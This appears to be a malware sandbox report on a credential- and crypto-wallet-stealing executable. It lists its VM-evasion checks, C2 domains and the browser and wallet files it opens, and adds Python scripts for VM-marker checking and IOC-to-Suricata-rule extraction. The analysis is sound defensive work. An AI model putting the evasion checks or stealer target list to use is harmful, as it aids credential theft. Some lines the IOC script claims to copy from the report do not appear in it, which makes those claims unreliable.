Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_010659F8
Source: ardware-v1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@13/4
Source: ardware-v1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ardware-v1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ardware-v1.exe, 00000000.00000003.2451716381.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428489732.0000000003874000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2429154844.0000000003855000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451602272.0000000003893000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ardware-v1.exe Virustotal: Detection: 20%
Source: ardware-v1.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\ardware-v1.exe File read: C:\Users\user\Desktop\ardware-v1.exe
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ardware-v1.exe Section loaded: ondemandconnroutehelper.dll
Source: ardware-v1.exe Static PE information: certificate valid
Source: ardware-v1.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: ardware-v1.exe Static file information: File size 3487960 > 1048576
Source: ardware-v1.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x312800
Source: ardware-v1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ardware-v1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ardware-v1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ardware-v1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ardware-v1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ardware-v1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ardware-v1.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: ardware-v1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Admin\Workspace\1191982842\Project\Release\Project.pdb source: ardware-v1.exe
Source: ardware-v1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ardware-v1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ardware-v1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ardware-v1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ardware-v1.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_01057640 push eax; ret 0_3_01057646
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_01056C4C push eax; ret 0_3_01056C52
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_01089F12 push edx; ret 0_3_01089F31
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_0109004C push esi; retf 0_3_0109004F
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_01089ED2 push esi; ret 0_3_01089F11
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_01089CD2 push ss; ret 0_3_01089D11
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_010C3999 push edi; iretd 0_3_010C399A
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_010C3999 push edi; iretd 0_3_010C399A
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_010C0BB9 push ecx; iretd 0_3_010C0D7A
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_010C0BB9 push ecx; iretd 0_3_010C0D7A
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_010C1D50 push ebx; retf 0_3_010C1D62
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_010C1D50 push ebx; retf 0_3_010C1D62
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_010C3999 push edi; iretd 0_3_010C399A
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_010C3999 push edi; iretd 0_3_010C399A
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_010C1D50 push ebx; retf 0_3_010C1D62
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_010C1D50 push ebx; retf 0_3_010C1D62
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_010C0BB9 push ecx; iretd 0_3_010C0D7A
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_010C0BB9 push ecx; iretd 0_3_010C0D7A
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_01089F12 push edx; ret 0_3_01089F31
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_0109004C push esi; retf 0_3_0109004F
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_01089ED2 push esi; ret 0_3_01089F11
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_01089CD2 push ss; ret 0_3_01089D11
Source: C:\Users\user\Desktop\ardware-v1.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\ardware-v1.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_0108A0AC rdtsc 0_3_0108A0AC
Source: C:\Users\user\Desktop\ardware-v1.exe TID: 7524 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\ardware-v1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: ardware-v1.exe, 00000000.00000003.2451270778.00000000038B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696494690p
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: ardware-v1.exe, ardware-v1.exe, 00000000.00000002.2632519003.000000000100C000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.0000000001055000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.0000000001057000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.0000000001055000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2521220683.0000000001055000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.0000000001055000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.0000000001057000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.0000000001057000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.0000000001054000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\ardware-v1.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\ardware-v1.exe Code function: 0_3_0108A0AC rdtsc 0_3_0108A0AC
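The two environment checks this section records, a firmware-table read (SystemFirmwareTableInformation, i.e. the raw SMBIOS data) and a WMI query for Win32_BIOS, are exactly the fields a sandbox operator has to scrub. What follows is an added example, not code from the sample and not Joe Sandbox code, that runs the same kind of comparison over constructed inputs so the strings a stock VMware guest exposes can be seen next to a physical-looking profile. The marker list (VM_MARKERS) and the BiosInfo and SMBIOS sample values are assumptions: the sample's own string list is encrypted in the binary and is not on this page.

```python
import re
from dataclasses import dataclass

# ASSUMPTION: generic hypervisor markers that stealer VM checks commonly test for.
# The sample's own list is encrypted in the binary and is not on this page.
VM_MARKERS = ("vmware", "virtualbox", "vbox", "innotek", "qemu", "bochs",
              "kvm", "xen", "parallels", "hyper-v", "virtual machine")


@dataclass(frozen=True)
class BiosInfo:
    """Subset of the Win32_BIOS properties returned by the WMI query the report
    records ('SELECT * FROM Win32_BIOS')."""
    Manufacturer: str
    SMBIOSBIOSVersion: str
    SerialNumber: str


def smbios_strings(table: bytes) -> list[str]:
    """Printable ASCII runs in a raw SMBIOS blob, i.e. the string table that
    follows each structure in the data GetSystemFirmwareTable('RSMB') returns.
    A four-character minimum keeps structure header bytes out of the result."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{4,}", table)]


def vm_evidence(bios: BiosInfo, table: bytes) -> list[str]:
    """One entry per field/marker hit. An empty list means neither check the
    report attributes to the sample would see anything hypervisor-specific."""
    hits = []
    fields = (("Win32_BIOS.Manufacturer", bios.Manufacturer),
              ("Win32_BIOS.SMBIOSBIOSVersion", bios.SMBIOSBIOSVersion),
              ("Win32_BIOS.SerialNumber", bios.SerialNumber))
    for name, value in fields:
        for marker in VM_MARKERS:
            if marker in value.lower():
                hits.append(f"{name}={value!r} contains {marker!r}")
    for s in smbios_strings(table):
        for marker in VM_MARKERS:
            if marker in s.lower():
                hits.append(f"SMBIOS string {s!r} contains {marker!r}")
    return hits


def is_sandbox_profile_clean(bios: BiosInfo, table: bytes) -> bool:
    """True when neither the WMI fields nor the firmware table leak a marker."""
    return not vm_evidence(bios, table)


# Constructed sample data (not taken from the report): a stock VMware guest and
# a Dell laptop. The leading zero bytes stand in for an SMBIOS structure header.
VMWARE_BIOS = BiosInfo("Phoenix Technologies LTD", "6.00",
                       "VMware-56 4d 00 11 22 33 44 55-66 77 88 99 aa bb cc dd")
VMWARE_SMBIOS = (b"\x00" * 8 + b"VMware, Inc.\x00"
                 b"VMware Virtual Platform\x00None\x00\x00")
PHYSICAL_BIOS = BiosInfo("Dell Inc.", "1.21.0", "7XK2Q93")
PHYSICAL_SMBIOS = b"\x00" * 8 + b"Dell Inc.\x00Latitude 7420\x00\x00"


if __name__ == "__main__":
    for label, bios, table in (("vmware", VMWARE_BIOS, VMWARE_SMBIOS),
                               ("physical", PHYSICAL_BIOS, PHYSICAL_SMBIOS)):
        print(label, "clean" if is_sandbox_profile_clean(bios, table) else "exposed")
        for hit in vm_evidence(bios, table):
            print("   ", hit)
```

The serial number is the field most often left alone when a guest is "hardened" by editing only the manufacturer string; the function reports it separately for that reason. The rdtsc timing check and the 30 s sleep also listed above are not reproduced here, since they depend on the host's clock rather than on a string the operator can rewrite.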

                HIPS / PFW / Operating System Protection Evasion

Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: debonairnukk.xyz
Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: diffuculttan.xyz
Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: effecterectz.xyz
Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: deafeninggeh.biz
Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: immureprech.biz
Source: C:\Users\user\Desktop\ardware-v1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\ardware-v1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: ardware-v1.exe, ardware-v1.exe, 00000000.00000003.2543143805.0000000001085000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632519003.0000000001021000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\ardware-v1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
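The five bare domains in this block (the decrypted C2 configuration) and the TLS connections listed in the network section earlier on this page are the indicators a responder extracts from a report like this. The script below is an added example, not part of the report or of the sample, that parses both kinds of observation line and turns them into a triage summary plus Suricata DNS rules. It is a heuristic: a memory string counts as a config domain only when it is a bare domain with no scheme or path, which is how this block differs from the ordinary URL strings found earlier (https://www.youtube.com and so on). The input lines are copied from this report; one youtube.com URL line is included as a negative control. The sid range in the rules is an assumption, and the contacted IPs are labelled "contacted" rather than "C2" because the report does not say which domain each IP served, only that some of them were seen with other malware.

```python
import re
from collections import Counter

# Observation lines copied from this report (network section and C2 block),
# plus one ordinary URL string as a negative control.
REPORT_LINES = [
    "Source: unknown HTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.8:49712 version: TLS 1.2",
    "Source: unknown HTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.8:49713 version: TLS 1.2",
    "Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49714 version: TLS 1.2",
] + [
    f"Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:{port} version: TLS 1.2"
    for port in range(49715, 49723)          # eight connections, ports 49715..49722
] + [
    "Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: debonairnukk.xyz",
    "Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: diffuculttan.xyz",
    "Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: effecterectz.xyz",
    "Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: deafeninggeh.biz",
    "Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmp String found in binary or memory: immureprech.biz",
    "Source: ardware-v1.exe, 00000000.00000003.2397059608.00000000010BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com",
]

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
HTTPS_RE = re.compile(
    rf"HTTPS traffic detected: (?P<dst>{IPV4}):(?P<dport>\d+) -> "
    rf"(?P<src>{IPV4}):(?P<sport>\d+) version: (?P<tls>TLS [\d.]+)")
# A bare domain: labels separated by dots, a TLD, then end of line. Anything with
# a scheme, port or path (the ordinary URL strings in the report) does not match.
BARE_DOMAIN_RE = re.compile(
    r"String found in binary or memory: (?P<domain>(?:[a-z0-9-]+\.)+[a-z]{2,})\s*$",
    re.IGNORECASE)


def extract_iocs(lines):
    """Aggregate contacted TLS endpoints and bare config domains from report lines."""
    endpoints = Counter()        # (dst_ip, dst_port) -> number of connections
    tls_versions = {}            # dst_ip -> TLS version string seen
    domains = set()
    for line in lines:
        m = HTTPS_RE.search(line)
        if m:
            endpoints[(m["dst"], int(m["dport"]))] += 1
            tls_versions[m["dst"]] = m["tls"]
            continue
        m = BARE_DOMAIN_RE.search(line)
        if m:
            domains.add(m["domain"].lower())
    return {"endpoints": endpoints, "tls": tls_versions, "domains": sorted(domains)}


def suricata_dns_rules(domains, base_sid=9100001):
    """One Suricata rule per config domain, keyed on the DNS query name.
    ASSUMPTION: the sid range is a local convention; use one free in your ruleset."""
    return [
        f'alert dns any any -> any any (msg:"LummaC config domain {d}"; '
        f'dns.query; content:"{d}"; nocase; endswith; sid:{base_sid + i}; rev:1;)'
        for i, d in enumerate(domains)
    ]


def triage_summary(iocs):
    """Lines a responder can paste into a ticket. Endpoints are reported as
    'contacted', not 'C2': the report does not say which domain each IP served."""
    out = []
    for (ip, port), n in iocs["endpoints"].most_common():
        out.append(f"contacted {ip}:{port} {n} time(s) over {iocs['tls'][ip]}")
    for d in iocs["domains"]:
        out.append(f"config domain {d}")
    return out


if __name__ == "__main__":
    iocs = extract_iocs(REPORT_LINES)
    print("\n".join(triage_summary(iocs)))
    print("\n".join(suricata_dns_rules(iocs["domains"])))
```

The endpoint counter makes the shape of the traffic visible at a glance: eight of the eleven TLS sessions go to one address, which is the pattern to pivot on in proxy or NetFlow logs, while the three single connections are the ones to check against the report's "seen with other malware" notes before blocking.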

                Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: ardware-v1.exe PID: 7748, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: ardware-v1.exe String found in binary or memory: Wallets/Electrum-LTC
Source: ardware-v1.exe String found in binary or memory: Wallets/ElectronCash
Source: ardware-v1.exe String found in binary or memory: window-state.json
Source: ardware-v1.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: ardware-v1.exe String found in binary or memory: Wallets/Exodus
Source: ardware-v1.exe String found in binary or memory: %appdata%\Ethereum
Source: ardware-v1.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: ardware-v1.exe String found in binary or memory: keystore
Source: ardware-v1.exe, 00000000.00000003.2428802821.0000000001057000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\ardware-v1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
